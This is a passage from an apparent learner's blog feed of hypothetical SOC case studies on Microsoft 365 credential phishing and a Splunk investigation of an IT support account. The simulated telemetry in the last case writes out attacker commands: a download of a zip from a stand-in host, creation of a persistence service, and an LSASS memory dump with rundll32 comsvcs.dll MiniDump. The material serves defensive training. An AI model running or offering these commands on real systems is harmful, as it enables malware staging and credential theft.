<p>Immediately reset Michael’s password and ensure the compromised password cannot continue to be used.</p>

<h3 id="4-investigate-mfa-activity">4. Investigate MFA activity</h3>

<p>Review the MFA approval and authentication-method configuration for:</p>

<ul>
  <li>Unexpected MFA registrations</li>
  <li>Additional authentication methods</li>
  <li>Suspicious MFA activity</li>
  <li>Repeated MFA prompts</li>
</ul>

<h3 id="5-search-for-other-phishing-victims">5. Search for other phishing victims</h3>

<p>Search the email gateway for:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>micr0soft-security.com
hr-support@micr0soft-security.com
https://micr0soft-security.com/verify
</code></pre></div></div>

<p>Identify other recipients, clicks and users who may have submitted credentials.</p>

<h3 id="6-investigate-microsoft-365-account-activity">6. Investigate Microsoft 365 account activity</h3>

<p>Review activity following the suspicious authentication for:</p>

<ul>
  <li>Mailbox access</li>
  <li>Email forwarding rules</li>
  <li>Inbox rules</li>
  <li>Suspicious outbound messages</li>
  <li>File access</li>
  <li>Privilege changes</li>
  <li>OAuth/application consent</li>
  <li>Additional suspicious sessions</li>
</ul>

<h3 id="7-contain-the-phishing-infrastructure">7. Contain the phishing infrastructure</h3>

<p>Block or quarantine the phishing domain and remove remaining messages containing the malicious indicators.</p>

<p>The IP should be evaluated carefully before blocking because infrastructure such as reverse proxies/CDNs can be shared.</p>

<h3 id="8-continue-monitoring">8. Continue monitoring</h3>

<p>Monitor Michael’s identity and endpoint for further authentication anomalies or suspicious activity.</p>

<hr />

<h1 id="11-soc-incident-note">11. SOC Incident Note</h1>

<blockquote>
  <p>A staff member from the HR department received a phishing email impersonating Microsoft and was directed to <code class="language-plaintext highlighter-rouge">micr0soft-security.com</code>, a recently registered typosquatted domain. Proxy telemetry confirmed access to the phishing site, followed by an HTTP POST to its login endpoint at 10:28:03. The user confirmed entering their Microsoft 365 username and password and approving an MFA notification. At 10:28:17, a successful Microsoft 365 authentication was recorded from <code class="language-plaintext highlighter-rouge">104.21.55.72</code> with MFA satisfied, strongly supporting credential compromise and likely account compromise. A subsequent Microsoft 365 authentication and session were established from <code class="language-plaintext highlighter-rouge">197.210.45.18</code>, requiring further investigation to determine whether the activity was legitimate or attacker-controlled. No suspicious process creation, PowerShell activity, file creation or EDR malware detection was observed on the endpoint. Recommended containment includes password reset, session/token revocation, MFA review, phishing IOC blocking and enterprise-wide IOC searching, followed by continued monitoring of the affected account.</p>
</blockquote>

<hr />

<h1 id="12-lessons-learned">12. Lessons Learned</h1>

<p>This investigation demonstrates why a SOC analyst should avoid stopping at the initial phishing alert.</p>

<p>The important progression was:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Suspicious Email
      ↓
Malicious Link
      ↓
Credential Submission
      ↓
MFA Approval
      ↓
Successful Authentication
      ↓
Potential Account Takeover
</code></pre></div></div>

<p>A phishing email alone does not necessarily mean compromise.</p>

<p>However, once credentials are submitted and successful authentication occurs shortly afterward, the investigation must shift from <strong>phishing detection</strong> to <strong>identity compromise and account containment</strong>.</p>

<p>Another important lesson is that <strong>MFA satisfaction does not automatically make an authentication legitimate</strong>. In this case, the user was socially engineered into approving the MFA request after submitting credentials.</p>

<p>Finally, the absence of malicious endpoint telemetry is significant. The available evidence indicates a credential-focused attack rather than malware-based workstation compromise.</p>

<hr />

<h2 id="mitre-attck-mapping">MITRE ATT&amp;CK Mapping</h2>

<table>
  <thead>
    <tr>
      <th>Technique</th>
      <th>Relevance</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><strong>T1566.002 — Phishing: Spearphishing Link</strong></td>
      <td>User received a malicious link designed to capture credentials</td>
    </tr>
    <tr>
      <td><strong>T1056.002 — Input Capture: GUI Input Capture</strong></td>
      <td>Phishing login page captured credentials</td>
    </tr>
    <tr>
      <td><strong>T1078 — Valid Accounts</strong></td>
      <td>Compromised credentials were used for Microsoft 365 authentication</td>
    </tr>
    <tr>
      <td><strong>T1098 — Account Manipulation</strong></td>
      <td>Should be investigated for unauthorized MFA/authentication-method changes</td>
    </tr>
  </tbody>
</table>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>The investigation confirms a <strong>successful credential-phishing attack</strong> against an HR employee.</p>

<p>The user interacted with a typosquatted Microsoft domain, submitted valid credentials, approved MFA, and a successful Microsoft 365 authentication occurred shortly afterward from infrastructure associated with the phishing activity.</p>

<p>At this stage, <strong>credential compromise is confirmed and account compromise is strongly supported</strong>, while there is insufficient evidence to classify the endpoint as compromised.</p>

<h2 id="the-appropriate-soc-response-is-therefore-to-contain-the-identity-compromise-investigate-post-authentication-activity-identify-additional-victims-remove-the-phishing-infrastructure-from-the-organizations-environment-and-continue-monitoring-for-further-abuse">The appropriate SOC response is therefore to contain the identity compromise, investigate post-authentication activity, identify additional victims, remove the phishing infrastructure from the organization’s environment, and continue monitoring for further abuse.</h2>]]></content><author><name>Precious Cyber6ixxx</name></author><category term="SOC" /><category term="Phishing" /><category term="Incident Response" /><category term="Microsoft 365" /><category term="phishing" /><category term="credential-theft" /><category term="account-compromise" /><category term="MFA" /><category term="Microsoft-365" /><category term="SOC" /><category term="incident-response" /><summary type="html"><![CDATA[🧪 SOC Phishing Case #003 — Credential Phishing + Possible Account Compromise]]></summary></entry><entry><title type="html">Soc Investigation Case Study Phishing Email Analysis</title><link href="/2026/08/16/SOC-Investigation-Case-Study-Phishing-Email-Analysis.html" rel="alternate" type="text/html" title="Soc Investigation Case Study Phishing Email Analysis" /><published>2026-08-16T00:00:00+00:00</published><updated>2026-08-16T00:00:00+00:00</updated><id>/2026/08/16/SOC-Investigation-Case-Study-Phishing-Email-Analysis</id><content type="html" xml:base="/2026/08/16/SOC-Investigation-Case-Study-Phishing-Email-Analysis.html"><![CDATA[<h1 id="soc-phishing-investigation--microsoft-account-verification">SOC Phishing Investigation — Microsoft Account Verification</h1>

<h2 id="credential-phishing-analysis-and-post-click-investigation">Credential Phishing Analysis and Post-Click Investigation</h2>

<hr />

<h2 id="1-investigation-overview">1. Investigation Overview</h2>

<p>This case study presents a hypothetical SOC investigation involving a phishing email impersonating Microsoft Security.</p>

<p>The exercise was designed to evaluate how a SOC analyst moves from:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Suspicious Email
      ↓
Sender Analysis
      ↓
Authentication Analysis
      ↓
URL Investigation
      ↓
User Interaction
      ↓
Endpoint Investigation
      ↓
Identity Investigation
      ↓
Impact Assessment
</code></pre></div></div>

<p>The objective was not simply to determine whether the email was malicious, but to determine:</p>

<ul>
  <li>Why the message was malicious</li>
  <li>Whether authentication results changed the assessment</li>
  <li>Whether the user was actually compromised</li>
  <li>What telemetry should be investigated after the click</li>
  <li>How the SOC should contain the threat</li>
  <li>How to distinguish exposure from confirmed compromise</li>
</ul>

<hr />

<h1 id="2-scenario">2. Scenario</h1>

<p>The SOC received a report concerning a suspicious Microsoft 365 security email.</p>

<h3 id="email">Email</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From:
Microsoft Security &lt;security@microsoft-login-alert.com&gt;

To:
j.smith@company.com

Subject:
URGENT: Your Microsoft 365 account will be suspended

Date:
14 August 2026 08:42 UTC
</code></pre></div></div>

<h3 id="email-body">Email Body</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Microsoft Security Alert

Your Microsoft 365 account requires immediate verification.

Our security system detected unusual activity associated
with your account.

If you do not verify your account within 24 hours,
access to your mailbox will be suspended.

Verify your account here:

https://microsoft-login-alert.com/verify

Microsoft Security Team
</code></pre></div></div>

<p>The user reported that they clicked the link because they were concerned that their account would be disabled.</p>

<p>The user stated that the resulting Microsoft-style login page was closed before credentials were entered.</p>

<hr />

<h1 id="3-email-authentication-results">3. Email Authentication Results</h1>

<p>The message returned:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SPF: PASS
DKIM: PASS
DMARC: PASS
</code></pre></div></div>

<p>At first glance, these results might appear reassuring.</p>

<p>However, authentication passing does <strong>not</strong> establish that an email is legitimate.</p>

<p>SPF, DKIM and DMARC primarily provide evidence about whether the message was authorized/authenticated according to the sending domain’s configured policies.</p>

<p>An attacker-controlled domain can also have properly configured email authentication.</p>

<p>Therefore:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SPF PASS
DKIM PASS
DMARC PASS
</code></pre></div></div>

<p>does not automatically mean:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BENIGN
</code></pre></div></div>

<p>The authentication results must be evaluated together with the sender domain, email content, URL infrastructure and user interaction.</p>

<hr />

<h1 id="4-first-point-of-suspicion">4. First Point of Suspicion</h1>

<h2 id="suspicious-sender-domain">Suspicious Sender Domain</h2>

<p>The first major indicator was:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>security@microsoft-login-alert.com
</code></pre></div></div>

<p>The sender presents itself as Microsoft Security, but the domain:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>microsoft-login-alert.com
</code></pre></div></div>

<p>is not an official Microsoft-owned domain.</p>

<p>This creates a strong brand-impersonation indicator.</p>

<p>The display name:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Microsoft Security
</code></pre></div></div>

<p>does not establish legitimacy.</p>

<p>The domain behind the sender address is considerably more important.</p>

<hr />

<h1 id="5-url-investigation">5. URL Investigation</h1>

<p>The email contained:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://microsoft-login-alert.com/verify
</code></pre></div></div>

<p>The URL redirected to:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>microsoft-login-alert.com/verify
        ↓
login-microsoft365-security.com/auth
</code></pre></div></div>

<p>The resulting page was designed to resemble a Microsoft 365 authentication page.</p>

<p>It requested:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Email address
Password
</code></pre></div></div>

<p>This significantly increased confidence that the objective of the campaign was credential harvesting.</p>

<p>The investigation therefore moved beyond:</p>

<blockquote>
  <p>“This looks like a suspicious email.”</p>
</blockquote>

<p>to:</p>

<blockquote>
  <p>“The email contains infrastructure designed to impersonate Microsoft and solicit authentication credentials.”</p>
</blockquote>

<hr />

<h1 id="6-assessment">6. Assessment</h1>

<h2 id="verdict-malicious">Verdict: Malicious</h2>

<p>I assess the email as a <strong>credential-phishing attempt</strong>.</p>

<p>The assessment is based on the combination of:</p>

<ol>
  <li>Microsoft impersonation</li>
  <li>A sender domain unrelated to Microsoft’s legitimate infrastructure</li>
  <li>Urgency designed to pressure the user into acting</li>
  <li>A suspicious authentication URL</li>
  <li>Redirection to another Microsoft-themed domain</li>
  <li>A fake Microsoft 365 login page</li>
  <li>Collection of email addresses and passwords</li>
</ol>

<p>The SPF, DKIM and DMARC passes do not overturn this assessment.</p>

<p>Instead, they indicate that the email was successfully authenticated according to the relevant domain configuration.</p>

<hr />

<h1 id="7-user-interaction-and-compromise-assessment">7. User Interaction and Compromise Assessment</h1>

<p>This is where the investigation requires careful distinction.</p>

<p>The available evidence establishes:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Email received
      ↓
Link clicked
      ↓
Phishing page displayed
      ↓
User reports closing page
      ↓
No confirmed credential submission
</code></pre></div></div>

<p>Therefore, based on the currently available evidence:</p>

<h3 id="confirmed">Confirmed</h3>

<ul>
  <li>Malicious email received</li>
  <li>User clicked the phishing URL</li>
  <li>Phishing page was accessed</li>
</ul>

<h3 id="not-confirmed">Not confirmed</h3>

<ul>
  <li>Credentials were submitted</li>
  <li>Credentials were stolen</li>
  <li>Microsoft account was compromised</li>
  <li>Malware was downloaded</li>
  <li>Endpoint was compromised</li>
</ul>

<p>I would therefore describe the user as <strong>exposed to a credential-phishing attempt</strong>, rather than declaring the account compromised.</p>

<p>However, the user’s statement should not be treated as the only source of truth.</p>

<p>The SOC should verify the claim using telemetry.</p>

<hr />

<h1 id="8-why-user-statements-are-not-sufficient">8. Why User Statements Are Not Sufficient</h1>

<p>A user may genuinely believe they did not submit credentials.</p>

<p>However, the SOC should verify the situation independently.</p>

<p>The investigation should determine whether authentication activity occurred after the phishing interaction.</p>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Phishing click
      ↓
Credential submission?
      ↓
Successful authentication?
      ↓
Unusual source IP?
      ↓
New device?
      ↓
Impossible travel?
      ↓
Session/token activity?
</code></pre></div></div>

<p>The absence of a user-reported password submission does not eliminate the possibility of compromise.</p>

<hr />

<h1 id="9-immediate-containment">9. Immediate Containment</h1>

<p>My first containment action would be to block the malicious sender/domain and prevent further delivery or interaction with the phishing infrastructure.</p>

<h3 id="priority-actions">Priority actions</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Block sender/domain
        ↓
2. Search mail gateway for matching messages
        ↓
3. Remove/quarantine matching emails
        ↓
4. Block malicious URLs/domains
        ↓
5. Investigate affected user's endpoint
        ↓
6. Investigate identity authentication
</code></pre></div></div>

<p>The email gateway should be searched for other recipients.</p>

<p>This is important because a phishing campaign rarely targets only one employee.</p>

<hr />

<h1 id="10-enterprise-wide-email-search">10. Enterprise-Wide Email Search</h1>

<p>I would search the email security platform for:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>microsoft-login-alert.com
login-microsoft365-security.com
</code></pre></div></div>

<p>and other available indicators from the message.</p>

<p>The objective would be to identify:</p>

<ul>
  <li>Other recipients</li>
  <li>Delivery status</li>
  <li>Click activity</li>
  <li>Additional messages from the sender</li>
  <li>Other related URLs</li>
  <li>Potentially compromised users</li>
</ul>

<p>If additional copies are found, they should be quarantined or removed before other employees interact with them.</p>

<hr />

<h1 id="11-endpoint-investigation">11. Endpoint Investigation</h1>

<p>Because the user clicked the URL, I would investigate the endpoint for evidence of additional activity.</p>

<p>Relevant telemetry would include:</p>

<h3 id="sysmon-event-id-1">Sysmon Event ID 1</h3>

<p>Process creation.</p>

<p>I would look for unexpected processes spawned around the time of the click.</p>

<p>For example:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Browser
   ↓
powershell.exe
   ↓
unknown.exe
</code></pre></div></div>

<p>would require immediate investigation.</p>

<h3 id="sysmon-event-id-3">Sysmon Event ID 3</h3>

<p>Network connections.</p>

<p>I would investigate whether the endpoint established unexpected connections following the phishing interaction.</p>

<h3 id="sysmon-event-id-11">Sysmon Event ID 11</h3>

<p>File creation.</p>

<p>I would determine whether the phishing interaction resulted in:</p>

<ul>
  <li>File downloads</li>
  <li>Executables</li>
  <li>Scripts</li>
  <li>Archives</li>
  <li>Other suspicious files</li>
</ul>

<h3 id="windows-event-id-4688">Windows Event ID 4688</h3>

<p>Process creation telemetry would provide additional visibility into processes launched around the event.</p>

<hr />

<h1 id="12-identity-investigation">12. Identity Investigation</h1>

<p>The next major investigation area would be the user’s Microsoft account.</p>

<p>I would investigate authentication activity around and after the phishing event.</p>

<p>Questions include:</p>

<ul>
  <li>Did the account authenticate after the click?</li>
  <li>Was there a successful login from an unusual IP?</li>
  <li>Was a new device observed?</li>
  <li>Was MFA challenged?</li>
  <li>Was MFA successfully completed?</li>
  <li>Were there unusual geographic locations?</li>
  <li>Were sessions created from unfamiliar devices?</li>
  <li>Were mailbox or account settings modified?</li>
</ul>

<p>The objective is to determine whether:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Phishing Exposure
</code></pre></div></div>

<p>became:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Credential Compromise
</code></pre></div></div>

<p>or:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Account Takeover
</code></pre></div></div>

<hr />

<h1 id="13-splunk-investigation">13. Splunk Investigation</h1>

<p>If relevant endpoint telemetry is available in Splunk, I would begin by investigating activity around the phishing event.</p>

<p>For example:</p>

<pre><code class="language-spl">index=wineventlog earliest=-2h latest=+2h
(EventCode=4688 OR EventCode=4624 OR EventCode=4625)
| table _time host EventCode AccountName ParentImage NewProcessName CommandLine Source_Network_Address
| sort _time
</code></pre>

<p>I would then pivot into:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Account
    ↓
Host
    ↓
LogonGUID
    ↓
ProcessGUID
    ↓
Network activity
</code></pre></div></div>

<p>The exact query would depend on the fields available in the environment.</p>

<hr />

<h1 id="14-investigation-questions">14. Investigation Questions</h1>

<p>The investigation should answer:</p>

<h3 id="email-1">Email</h3>

<ul>
  <li>Who else received the message?</li>
  <li>Was the message delivered successfully?</li>
  <li>Were there additional related emails?</li>
</ul>

<h3 id="url">URL</h3>

<ul>
  <li>What domains were involved?</li>
  <li>Where did the URL redirect?</li>
  <li>Was the page collecting credentials?</li>
  <li>What infrastructure hosted the phishing page?</li>
</ul>

<h3 id="endpoint">Endpoint</h3>

<ul>
  <li>Did the user download anything?</li>
  <li>Did any suspicious process execute?</li>
  <li>Did the browser spawn unusual child processes?</li>
  <li>Were there unexpected network connections?</li>
</ul>

<h3 id="identity">Identity</h3>

<ul>
  <li>Did the user authenticate after clicking?</li>
  <li>Were there unusual successful logins?</li>
  <li>Were sessions created from unfamiliar locations or devices?</li>
  <li>Was MFA triggered or bypassed?</li>
</ul>

<h3 id="impact">Impact</h3>

<ul>
  <li>Was the account compromised?</li>
  <li>Was mailbox data accessed?</li>
  <li>Were rules or forwarding settings created?</li>
  <li>Did the attacker attempt further activity?</li>
</ul>

<hr />

<h1 id="15-preliminary-severity">15. Preliminary Severity</h1>

<h2 id="severity-medium">Severity: Medium</h2>

<p>I would initially assign a <strong>Medium preliminary severity</strong> because:</p>

<ul>
  <li>The email is assessed as malicious.</li>
  <li>The user interacted with the phishing URL.</li>
  <li>The destination requested authentication credentials.</li>
  <li>The attack directly targeted an enterprise identity.</li>
</ul>

<p>However, severity should be refined as additional evidence becomes available.</p>

<p>There is an important distinction between:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>High-risk exposure
</code></pre></div></div>

<p>and:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Confirmed account compromise
</code></pre></div></div>

<p>At the current stage, the evidence supports the former.</p>

<p>If authentication logs demonstrate that stolen credentials were subsequently used, the incident severity and scope should be escalated accordingly.</p>

<hr />

<h1 id="16-recommended-detection-improvements">16. Recommended Detection Improvements</h1>

<p>This case also demonstrates several opportunities for improving detection.</p>

<h3 id="email-security">Email Security</h3>

<p>Detect:</p>

<ul>
  <li>Microsoft impersonation</li>
  <li>Newly observed sender domains</li>
  <li>Lookalike domains</li>
  <li>Credential-harvesting URLs</li>
  <li>Microsoft-themed domains outside Microsoft’s legitimate infrastructure</li>
</ul>

<h3 id="endpoint-1">Endpoint</h3>

<p>Correlate:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Phishing URL click
      ↓
Browser activity
      ↓
File creation
      ↓
Process execution
      ↓
Network connection
</code></pre></div></div>

<h3 id="identity-1">Identity</h3>

<p>Alert on:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Phishing interaction
      ↓
Successful authentication
      ↓
Unusual source/device/location
</code></pre></div></div>

<p>This type of correlation can help identify account compromise following phishing activity.</p>

<hr />

<h1 id="17-lessons-learned">17. Lessons Learned</h1>

<p>The most important lesson from this investigation is that <strong>email authentication is only one part of the investigation</strong>.</p>

<p>A message can pass:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SPF
DKIM
DMARC
</code></pre></div></div>

<p>and still be malicious.</p>

<p>The analyst must correlate:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sender
   ↓
Authentication
   ↓
Domain
   ↓
URL
   ↓
User interaction
   ↓
Endpoint
   ↓
Identity
   ↓
Impact
</code></pre></div></div>

<p>Another important lesson is the distinction between <strong>exposure and compromise</strong>.</p>

<p>A user clicking a phishing link is serious, but it does not automatically prove that credentials were stolen.</p>

<p>The SOC must investigate the evidence before making that determination.</p>

<hr />

<h1 id="18-final-analyst-assessment">18. Final Analyst Assessment</h1>

<h3 id="verdict">Verdict</h3>

<p><strong>Malicious — Credential Phishing</strong></p>

<h3 id="user-status">User Status</h3>

<p><strong>Exposed; compromise not currently confirmed</strong></p>

<h3 id="primary-risks">Primary Risks</h3>

<ul>
  <li>Credential theft</li>
  <li>Microsoft 365 account takeover</li>
  <li>Session/token compromise</li>
  <li>Follow-on identity attacks</li>
</ul>

<h3 id="immediate-actions">Immediate Actions</h3>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Block malicious sender/domain
        ↓
Search and remove campaign emails
        ↓
Block phishing URLs/domains
        ↓
Investigate endpoint telemetry
        ↓
Review identity authentication
        ↓
Continue monitoring the affected account
</code></pre></div></div>

<hr />

<h1 id="19-soc-analyst-takeaway">19. SOC Analyst Takeaway</h1>

<p>This exercise reinforced an important SOC investigation principle:</p>

<blockquote>
  <p><strong>Do not stop at identifying the phishing email. Determine what happened after the user interacted with it.</strong></p>
</blockquote>

<p>The real investigation begins when we ask:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Did they click?
      ↓
Did they submit credentials?
      ↓
Did the account authenticate elsewhere?
      ↓
Did the endpoint execute anything?
      ↓
Did the attacker gain persistence?
      ↓
Was organizational data accessed?
</code></pre></div></div>

<p>That progression turns a phishing alert into a defensible incident assessment.</p>

<hr />

<h1 id="skills-demonstrated">Skills Demonstrated</h1>

<p>Through this investigation, I practiced:</p>

<ul>
  <li>Phishing analysis</li>
  <li>Email authentication analysis</li>
  <li>Sender/domain investigation</li>
  <li>URL and redirect analysis</li>
  <li>Credential-phishing detection</li>
  <li>User interaction assessment</li>
  <li>Windows endpoint telemetry analysis</li>
  <li>Splunk investigation methodology</li>
  <li>Identity investigation</li>
  <li>Incident severity assessment</li>
  <li>Containment planning</li>
  <li>SOC reporting</li>
</ul>

<hr />

<h1 id="conclusion">Conclusion</h1>

<p>This hypothetical investigation strengthened my understanding of how a SOC analyst should investigate phishing beyond simply identifying a malicious email.</p>

<p>The key objective is to establish the complete chain:</p>

<p><strong>Email → Interaction → Endpoint → Identity → Impact</strong></p>

<p>By separating confirmed evidence from assumptions, the analyst can avoid both underestimating a potential compromise and prematurely declaring an account compromised without supporting evidence.</p>

<hr />

<h2 id="author">Author</h2>

<p><strong>Precious Anyanwu</strong></p>

<table>
  <tbody>
    <tr>
      <td>Cybersecurity Learner</td>
      <td>SOC Analyst Path</td>
      <td>Splunk SIEM Practice</td>
    </tr>
  </tbody>
</table>

<p>```</p>]]></content><author><name>Precious Cyber6ixxx</name></author><summary type="html"><![CDATA[SOC Phishing Investigation — Microsoft Account Verification]]></summary></entry><entry><title type="html">Soc Investigation Legitimate Administration To Confirmed Compromise</title><link href="/2026/08/14/soc-investigation-legitimate-administration-to-confirmed-compromise.html" rel="alternate" type="text/html" title="Soc Investigation Legitimate Administration To Confirmed Compromise" /><published>2026-08-14T00:00:00+00:00</published><updated>2026-08-14T00:00:00+00:00</updated><id>/2026/08/14/soc-investigation-legitimate-administration-to-confirmed-compromise</id><content type="html" xml:base="/2026/08/14/soc-investigation-legitimate-administration-to-confirmed-compromise.html"><![CDATA[<h1 id="splunk-soc-investigation--itsupport02-from-legitimate-administration-to-confirmed-compromise">Splunk SOC Investigation — ITSupport02: From Legitimate Administration to Confirmed Compromise</h1>

<h2 id="overview">Overview</h2>

<p>This hypothetical SOC investigation examines activity involving <code class="language-plaintext highlighter-rouge">ITSupport02</code> across <code class="language-plaintext highlighter-rouge">CLIENT60</code>, <code class="language-plaintext highlighter-rouge">CLIENT61</code>, <code class="language-plaintext highlighter-rouge">DC01</code>, and <code class="language-plaintext highlighter-rouge">FILESERVER02</code>.</p>

<p>The exercise is designed around an important SOC challenge: <strong>legitimate administrative activity can closely resemble attacker behavior</strong>. The investigation therefore begins without assuming compromise and progressively evaluates the evidence until the activity crosses the threshold for incident declaration.</p>

<p>The key investigative question is:</p>

<blockquote>
  <p><strong>At what point does legitimate IT administration end and attacker behavior begin?</strong></p>
</blockquote>

<hr />

<h1 id="investigation-environment">Investigation Environment</h1>

<table>
  <thead>
    <tr>
      <th>Host</th>
      <th>Role</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">CLIENT60</code></td>
      <td>IT Support workstation</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">CLIENT61</code></td>
      <td>Remote endpoint</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">DC01</code></td>
      <td>Domain Controller</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">FILESERVER02</code></td>
      <td>File server</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">ITSupport02</code></td>
      <td>Account under investigation</td>
    </tr>
  </tbody>
</table>

<hr />

<h1 id="telemetry-under-investigation">Telemetry Under Investigation</h1>

<p>The following is the complete telemetry available to the analyst.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:41:12 — CLIENT60
4624

Account: ITSupport02
Logon Type: 2
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:42:03 — CLIENT60
4104

Get-Service
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:42:17 — CLIENT60
4104

Get-Process
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:43:02 — CLIENT60
4104

Get-ADComputer -Filter *
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:44:11 — CLIENT60
4688

powershell.exe

Enter-PSSession -ComputerName CLIENT61
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:44:15 — CLIENT61
4624

Account: ITSupport02
Logon Type: 3
Source: CLIENT60
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:44:32 — CLIENT61
4104

Get-Service
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:44:51 — CLIENT61
4104

Get-ADGroupMember "Domain Admins"
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:45:13 — DC01
4769

Account: ITSupport02
Service:

cifs/FILESERVER02
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:45:22 — FILESERVER02
4624

Account: ITSupport02
Logon Type: 3
Source: CLIENT61
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:45:39 — FILESERVER02
4663

Object:

\\FILESERVER02\IT\DeploymentPackages.zip

Access:

ReadData
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:46:08 — CLIENT61
4104

Invoke-WebRequest
https://updates-example.net/support.zip
-OutFile C:\ProgramData\support.zip
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:46:19 — CLIENT61
Sysmon Event ID 11

File Created:

C:\ProgramData\support.zip
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:46:51 — CLIENT61
4688

7z.exe

7z.exe x C:\ProgramData\support.zip
-oC:\ProgramData\Support
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:04 — CLIENT61
Sysmon Event ID 1

Process:

supportsvc.exe

Parent:

7z.exe
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:09 — CLIENT61
Sysmon Event ID 3

supportsvc.exe
        ↓
185.220.101.44
        ↓
443
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:31 — CLIENT61
4688

sc.exe create WindowsSupport
binPath= C:\ProgramData\Support\supportsvc.exe
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:47:46 — CLIENT61
7045

Service Name:

WindowsSupport

Image Path:

C:\ProgramData\Support\supportsvc.exe
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:48:20 — CLIENT61
4688

rundll32.exe

comsvcs.dll, MiniDump 612
C:\ProgramData\lsass.dmp full
</code></pre></div></div>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:48:39 — CLIENT61
Sysmon Event ID 11

File Created:

C:\ProgramData\lsass.dmp
</code></pre></div></div>

<hr />

<h1 id="1-where-does-legitimate-activity-end">1. Where Does Legitimate Activity End?</h1>

<p>I would place the <strong>last potentially legitimate activity</strong> around:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>08:45:39 — FILESERVER02
4663

\\FILESERVER02\IT\DeploymentPackages.zip

ReadData
</code></pre></div></div>

<p>There is a plausible administrative explanation for the activity before this point.</p>

<p><code class="language-plaintext highlighter-rouge">ITSupport02</code> logs onto <code class="language-plaintext highlighter-rouge">CLIENT60</code>, performs basic system discovery, enumerates computers in Active Directory, and remotely connects to <code class="language-plaintext highlighter-rouge">CLIENT61</code>.</p>

<p>That could represent normal IT support activity.</p>

<p>Even the access to:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\\FILESERVER02\IT\DeploymentPackages.zip
</code></pre></div></div>

<p>could be legitimate if the IT team uses a centralized deployment package repository.</p>

